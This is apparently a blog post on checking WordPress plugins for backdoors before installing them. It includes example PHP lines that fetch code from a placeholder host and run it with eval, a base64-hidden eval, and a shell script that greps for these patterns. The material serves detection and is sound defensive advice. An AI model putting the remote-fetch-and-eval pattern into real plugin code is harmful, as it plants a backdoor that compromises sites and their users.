Are You Trusting WordPress Plugins Too Much
When it comes to installing a new plugin, I almost always find myself asking: “Do I really need a plugin for this, or can I just write my own code?” The reason being, I simply don’t like having too many plugins installed on my website. More plugins means more bloat, which can slow down your website and potentially cause other performance issues. And not just that, but it also introduces security risks that can put you or your users in harm’s way. With plugins, less is more.
A recent TechCrunch article, “Someone planted backdoors in dozens of WordPress plug-ins used in thousands of websites,” shows that just because a plugin has millions of installs doesn’t mean it’s safe. I’ve put together a list of things to check before installing any plugin on a live production site.
1. Look for suspicious code such as eval(, base64_decode(, gzinflate(, and remote URLs. The best way to do this is to navigate to the plugin folder in your WordPress install:

wp-content/plugins/plugin-name/

Inside the plugin folder, you should see files that look similar to this list:
- plugin-name.php (main file)
- other .php files
- sometimes /includes/ or /admin/ folders

Open plugin-name.php and search for eval(, base64_decode(, gzinflate(, and remote URLs. Be sure to also check around in the “includes” folder if you have one. Sometimes hackers will try and hide stuff in there as well.

Examples of bad code might look like:

```php
// Fetches code from a remote server and executes it: a classic backdoor pattern.
$code = file_get_contents("http://random-site.com/code.php");
eval($code);
// Payload hidden behind base64 so a quick look at the file reveals nothing.
eval(base64_decode("aWYoJHh4KXs..."));
```

2. Search the name of the plugin + “vulnerability” or the word “hack”.
Install the plugin on a staging website and test it there before moving it to a live production site. (This is always good practice: you should almost never make changes to your live website without first testing them on a staging site.)
3. Always back up your website regularly! A really good plugin for backups is UpdraftPlus, but I recommend manual backups; then you’ve just eliminated another plugin that you really don’t need.
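To make step 1 repeatable, here is an added example (not code from the original post) that greps a plugin folder for the constructs listed above. The function names and the sample plugin files it builds are constructed for this demo; point scan_plugin_dir at a real wp-content/plugins/plugin-name/ folder to use it.

```shell
#!/bin/sh
# Added example, not from the original post: automate step 1 by grepping a
# plugin folder for eval(, base64_decode(, gzinflate( and remote URLs.
# Function names and the sample plugin files below are constructed for this demo.

# Print one "file:line:match" line per suspicious construct under directory $1.
scan_plugin_dir() {
  grep -rnoE --include='*.php' \
    'eval\(|base64_decode\(|gzinflate\(|https?://[^"[:space:]]+' "$1"
}

# Number of hits, for use in scripts (0 hits means nothing to review, not "clean").
count_suspicious() {
  scan_plugin_dir "$1" | wc -l | tr -d ' '
}

# Build a throwaway folder that mimics wp-content/plugins/plugin-name/ with the
# bad patterns from the post planted in the main file and in /includes/.
make_sample_plugin() {
  dir=$(mktemp -d "${TMPDIR:-/tmp}/plugin-name.XXXXXX")
  mkdir -p "$dir/includes"
  cat > "$dir/plugin-name.php" <<'EOF'
<?php
/* Plugin Name: Sample plugin (constructed for this example) */
$code = file_get_contents("http://random-site.com/code.php");
eval($code);
EOF
  cat > "$dir/includes/helper.php" <<'EOF'
<?php
eval(base64_decode("aWYoJHh4KXs..."));
function helper_ok() { return 42; }
EOF
  printf '%s\n' "$dir"
}

# Stand-alone run: build the sample folder, list the hits, clean up.
sample=$(make_sample_plugin)
scan_plugin_dir "$sample"
echo "suspicious constructs found: $(count_suspicious "$sample")"
rm -rf "$sample"
```

Expect false positives: a legitimate plugin header carries a “Plugin URI:” link, so every hit is a line to read, not proof of a backdoor.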
But not for nothing, one of the best plugins you can install on a website is Wordfence Premium. Without exception, this is one plugin I will never go without on any of my WordPress websites. I’ve actually made a tutorial about Wordfence showing how to set up 2FA, which is crucial nowadays, especially since many platforms now require it. This keeps your site protected even if your WordPress credentials get into the wrong hands.
Something else Wordfence does is scan for common threats and malware that may be inside plugins and could put your website at risk. While the free version is better than no protection at all, I recommend the Premium version because it provides real-time protection: with the free version there is still about a 30-day delay in receiving new firewall rules and malware signatures. For $149 a year, it’s well worth the investment to protect your website and reputation, as well as the users interacting with your site.
Learn more about Wordfence by visiting my review page.